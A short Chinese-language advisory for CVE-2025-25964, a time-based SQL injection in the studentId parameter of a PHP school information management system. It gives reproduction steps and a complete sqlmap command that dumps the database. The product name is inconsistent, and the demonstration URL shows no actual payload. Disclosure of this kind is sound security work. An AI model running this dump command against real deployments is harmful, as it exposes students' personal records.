在当今数字环境中,SQL 注入(SQLi)仍然是 Web 应用程序中最常见且最危险的漏洞之一。本文讨论了一个在由 Itsourcecode 开发的学校信息管理系统 v1.0 中发现的严重 SQL 注入漏洞(CVE-2025-25964)。该漏洞允许远程攻击者利用该系统,可能导致敏感信息泄露。
CVE ID:CVE-2025-25964
漏洞类型:SQL 注入(SQLi)
受影响产品:学生信息管理系统 - v1.0
受影响组件:/columbans/admin/modules/student/index.php 中的 studentId 参数
攻击类型:远程
严重性:高
发现者:Sakib Shaikh
为了演示影响,请按照以下分步说明操作:
设置易受攻击的应用程序: 在本地服务器上安装并配置学校信息管理系统 v1.0。
登录: 使用 Itsourecode 提供的凭据登录。
访问易受攻击的端点:
http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207
观察应用程序响应: 如果页面需要 10 秒以上才能加载,则确认存在 SQL 注入漏洞。这证明后端数据库正在执行注入的 SQL 查询。
使用 SQLMap 进行自动化利用:
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast
此命令尝试从系统中提取数据库名称、数据表以及敏感信息。
该问题源于 index.php 文件中 studentId 参数缺乏适当的输入清理。当攻击者使用恶意 SQL 载荷修改 studentId 参数时,应用程序在未经过正确验证的情况下处理该输入,从而导致 SQL 注入。